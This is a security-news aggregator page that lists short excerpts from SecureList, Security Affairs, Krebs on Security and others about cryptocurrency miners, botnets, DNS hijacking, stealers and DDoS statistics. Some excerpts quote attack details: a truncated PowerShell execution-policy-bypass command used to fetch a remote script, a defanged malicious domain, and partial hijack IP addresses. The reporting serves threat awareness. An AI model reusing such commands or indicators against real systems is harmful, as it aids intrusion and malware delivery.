SecureList

OCTOBER 25, 2023

Introduction It’s just another cryptocurrency miner… Nobody would even suspect the mining malware was merely a mask, masquerading behind an intricate modular framework that supports both Linux and Windows. During that time, it had effectively evaded analysis and had previously been misclassified as a cryptocurrency miner.

Malware 119

Malware DNS Encryption Cryptocurrency 119

Security Affairs

JANUARY 18, 2022

According to the security firm, the group is financially motivated, its cyberespionage campaign hit high value targets such as government and educational institutions, religious movements, pro-democracy and human rights organisations in Hong Kong, Covid-19 research organisations, gambling and cryptocurrency companies, and the media.

Cryptocurrency 112

Cryptocurrency Social Engineering Media Phishing 112

Security Affairs

DECEMBER 19, 2022

The botnet was involved in stealing users’ credentials and data, mining cryptocurrencies abusing victims’ resources, and setting up proxies to funnel other people’s internet traffic through infected machines and routers. Botnet operators use to spread the malware via cracked or pirated software and pay-per-install (PPI) schemes.

DNS 100

DNS Antivirus Cryptocurrency Software 100

SecureList

MARCH 10, 2021

Some time ago, we discovered a number of fake apps delivering a Monero cryptocurrency miner to user computers. After substituting the DNS servers, the malware starts updating itself by running update.exe with the argument self-upgrade (“C:Program Files (x86)AdShieldupdater.exe” -self-upgrade). Patched.netyyk. netshieldkit[.]com.

DNS 144

DNS Antivirus Malware Encryption 144

Security Affairs

JANUARY 28, 2021

The TeamTNT cybercrime group has improved its Linux cryptocurrency miner by implementing open-source detection evasion capabilities. The TeamTNT cybercrime group has upgraded their Linux cryptocurrency miner by adding open-source detection evasion capabilities, AT&T Alien Labs researchers warn. Set persistence through systemd.

Cryptocurrency 122

Cryptocurrency Cybercrime DNS Malware 122

Krebs on Security

MARCH 28, 2021

But Watson said they don’t know how many of those systems also ran the secondary download from the rogue Krebsonsecurity domain. I first heard about the domain in December 2020, when a reader told me how his entire network had been hijacked by a cryptocurrency mining botnet that called home to it. I’d been doxed via DNS.

Hacking 357

Hacking Cybercrime DNS Antivirus 357

Security Affairs

FEBRUARY 24, 2021

Security experts from Akamai have spotted a new botnet used for illicit cryptocurrency mining activities that are abusing Bitcoin (BTC) transactions to implement a backup mechanism for C2. Botnet operators used Redis server scanners to find installs that could be compromised to mine cryptocurrencies. . ” continues the report.

Backups 112

Backups Cryptocurrency DNS Malware 112

Security Affairs

MARCH 26, 2020

Hackers compromiseD -Link and Linksys routers and change DNS settings to redirect users to bogus sites proposing a fake COVID-19 information app from the World Health Organization. Experts from BleepingComputer reported that attackers would change the configured DNS servers to 109 [. ” reported BleepingComputer. 103.82.249.

Malware 80

Malware DNS Advertising Cryptocurrency 80

Security Affairs

JANUARY 19, 2021

. “In all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to download and execute a Python script named “out.py”.” “After the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2.

DDOS 138

DDOS DNS Malware Internet 138

Security Affairs

JANUARY 13, 2019

ServHelper has two variants: one focused on remote desktop functions and a second that primarily functions as a downloader.” “Additionally we have observed the downloader variant download a malware we call “FlawedGrace.” The threat actors use the.bit Top-Level Domain (TLD) for the Domain Name System (DNS) servers.

Malware 93

Malware DNS Financial Services Retail 93

Security Affairs

MAY 6, 2023

Twitter confirmed that a security incident publicly exposed Circle tweets FBI seized other domains used by the shadow eBook library Z-Library WordPress Advanced Custom Fields plugin XSS exposes +2M sites to attacks Fortinet fixed two severe issues in FortiADC and FortiOS Pro-Russia group NoName took down multiple France sites, including the French (..)

Data breaches 95

Data breaches Malware Mobile Spyware 95

CyberSecurity Insiders

SEPTEMBER 21, 2021

The campaign uses multiple shell/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more. 7z to decompress downloaded files. At the end of the execution, the malware deletes any file that has been downloaded. Windows component – Set up a cryptocurrency miner. See figure 6.).

Cryptocurrency 84

Cryptocurrency Malware Passwords Authentication 84

SecureList

AUGUST 30, 2023

The attackers were able to embed malicious code into the libffmpeg media processing library to download a payload from their servers. While investigating an infection of a cryptocurrency company in Southeast Asia, we found Gopuram coexisting on target computers with AppleJeus , a backdoor attributed to the Lazarus.

Malware 79

Malware Spyware Cryptocurrency Government 79

SecureList

DECEMBER 1, 2023

To persuade people to download these mods instead of the official app, the developer claimed that they worked faster than other clients thanks to a distributed network of data centers around the world. The version of Free Download Manager installed by the infected package was released on January 24, 2020. org domain.

Malware 106

Malware Ransomware Encryption Energy and Utilities 106

Security Affairs

AUGUST 26, 2018

Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->. Copyright (C) 2014 Media.net Advertising FZ-LLC All Rights Reserved -->.

Spyware 42

Spyware Banking DNS Retail 42

SecureList

JUNE 7, 2023

Mobile statistics Targeted attacks BlueNoroff introduces new methods bypassing MotW At the close of 2022, we reported the recent activities of BlueNoroff , a financially motivated threat actor known for stealing cryptocurrency. The threat actor typically exploits Word documents, using shortcut files for the initial intrusion.

DNS 102

DNS Malware Cryptocurrency Retail 102

SecureList

JULY 28, 2021

It is linked to a vulnerability in DNS resolvers that allows amplification attacks on authoritative DNS servers. Attacks on DNS servers are dangerous because all the resources they serve become unavailable, regardless of their size and level of DDoS protection. Q2 2020 data is taken as 100% ( download ). Statistics.

DDOS 140

DDOS DNS IoT Marketing 140

Security Affairs

APRIL 9, 2019

The origin of the infection chain is a simple LNK file, a technique originally adopted by state sponsored and advanced actors, designed to download and run a powershell file named “rdp.ps1” from a remote location through the command: C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy Bypass -Windo 1 $wm=[Text.Encoding]::UTF8.

Malware 71

Malware Advertising DNS Antivirus 71

SecureList

FEBRUARY 16, 2021

The DTLS (Datagram Transport Layer Security) protocol is used to establish secure connections over UDP, through which most DNS queries, as well as audio and video traffic, are sent. While the resource was down, cryptocurrency newbies were invited to download a copy of Bitcoin Core via a torrenting service.

DDOS 135

DDOS Cryptocurrency Marketing Internet 135

Security Affairs

FEBRUARY 5, 2021

At the end of January, the group has improved its Linux cryptocurrency miner by implementing open-source detection evasion capabilities. The malware deploys the XMRig mining tool to mine Monero cryptocurrency. The attacker downloaded tmate and issued a command to run it and establish a reverse shell to tmate.io

Malware 110

Malware DNS Cryptocurrency Internet 110

Security Affairs

FEBRUARY 10, 2019

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner. “It installs a cryptocurrency-mining malware as well as implant itself into the system and crontabs to survive reboots and deletions.”

Malware 94

Malware Cryptocurrency Advertising DNS 94

Security Boulevard

JUNE 15, 2023

Oftentimes this is credential data, but it can be any data that may have financial value to an adversary; this includes paid online service accounts, cryptocurrency wallets, instant messenger, or email contacts lists, etc. Key Mystic Stealer functions include its ability to extract data from web browsers and cryptocurrency wallets.

Cryptocurrency 52

Cryptocurrency Password Management Malware DNS 52

Fox IT

JUNE 29, 2022

Those SMS messages were fake notifications which lured the user into a fake website in order to download a mobile application to track the shipping. Most used features were the web injections to steal banking and cryptocurrency platform credentials and sending SMS features to distribute and infect new devices. From version 2.1

Banking 97

Banking Malware DNS Encryption 97

SecureList

FEBRUARY 10, 2022

In some cases, DNS amplification was also used. The botnet can also install proxy servers on infected devices, mine cryptocurrency and conduct DDoS attacks. Q4 2020 data is taken as 100% ( download ). Percentage distribution of DDoS attacks by month, Q4 2021 ( download ). times against the same period last year.

DDOS 117

DDOS Cryptocurrency Marketing Accountability 117

SecureList

MAY 27, 2022

In January, we reported a malicious campaign targeting companies that work with cryptocurrencies, smart contracts, decentralized finance and blockchain technology: the attackers are interested in fintech in general. The campaign has two goals: gathering information and stealing cryptocurrency.

Phishing 116

Phishing Spyware Firmware Malware 116

SecureList

MAY 26, 2021

Number of EU users attacked by financial malware, May 2020 – April 2021 ( download ). Geography of banking malware attacks in the EU, May 2020 – April 2021 ( download ). Number of new ransomware modifications detected in the EU, May 2020 – April 2021 ( download ). Threat geography. Top 10 EU countries by share of attacked users.

Phishing 138

Phishing Malware Ransomware Adware 138

eSecurity Planet

JULY 28, 2021

Since blockchain’s arrival, cryptocurrency has framed the technology as permissionless, or a public blockchain. The razzmatazz of cryptocurrency hasn’t helped blockchain’s adoption as a technology beyond finance. Verifying and logging software updates and downloads. More robust security for Domain Name Systems (DNS).

Cybersecurity 135

Cybersecurity Cryptocurrency Technology Energy and Utilities 135

eSecurity Planet

FEBRUARY 16, 2021

Adware, also known as malvertising , is a type of malware that downloads or displays advertisements to the user interface. Users sometimes unknowingly infect themselves with adware installed by default when they download and install other applications. Most users are familiar with adware in the form of unclosable browser pop-ups.

Malware 105

Malware Adware Spyware Antivirus 105

SecureList

APRIL 27, 2022

We have previously seen DustSquad use third-party post-exploitation tools, such as the password dumping utility fgdump; but we have now observed new custom C modules, a first for DustSquad, and Delphi downloaders acting as post-exploitation facilitators, able to gather documents of interest for the actor.

Malware 136

Malware Firmware Government Phishing 136

SecureList

MAY 1, 2023

Note that they are rounded to 0.1 ( download ) At least the ROC curve looks alright, but there is no point at which this prompt would outperform the cybersecurity guru from the previous attempt: ROC curve based on probabilities provided by ChatGPT To conclude, it is hard to predict the behavior of the LLM based on human reasoning about the prompt.

Phishing 123

Phishing DNS Cybersecurity Internet 123

SecureList

NOVEMBER 18, 2022

Number of unique users attacked by financial malware, Q3 2022 ( download ). Number of new ransomware modifications, Q3 2021 — Q3 2022 ( download ). Number of unique users attacked by ransomware Trojans, Q3 2022 ( download ). Number of new miner modifications, Q3 2022 ( download ). TOP 10 banking malware families.

Mobile 95

Mobile Malware Ransomware IoT 95

SecureList

SEPTEMBER 26, 2022

These websites are often related to crack, keygen and activators for downloading software illegally, and while they may pretend to be legitimate software, they actually contain a malware dropper. The whole infection chain of NullMixer is as follows: The user visits a website to download cracked software, keygens or activators.

Malware 118

Malware Cryptocurrency Passwords Software 118